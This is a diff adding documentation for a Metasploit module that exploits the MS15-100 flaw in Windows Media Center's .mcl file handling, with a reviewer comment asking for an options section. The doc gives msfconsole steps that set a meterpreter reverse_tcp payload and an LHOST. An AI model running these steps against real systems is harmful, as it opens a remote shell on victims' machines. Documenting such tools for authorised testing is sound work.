documentation/modules/exploit/windows/fileformat/ms15_100_mcl_exe.md

```diff
@@ -0,0 +1,35 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe`
+3. Do: `set FILENAME [filename.mcl]`
+4. Do: `set FILE_NAME [filename.exe]`
+5. Do: `set payload [windows/meterpreter/reverse_tcp]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
```

Comment:
can you add an options section (common on most docs) that outlines `filename` and `file_name`? Example: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/freebsd/local/intel_sysret_priv_esc.md#options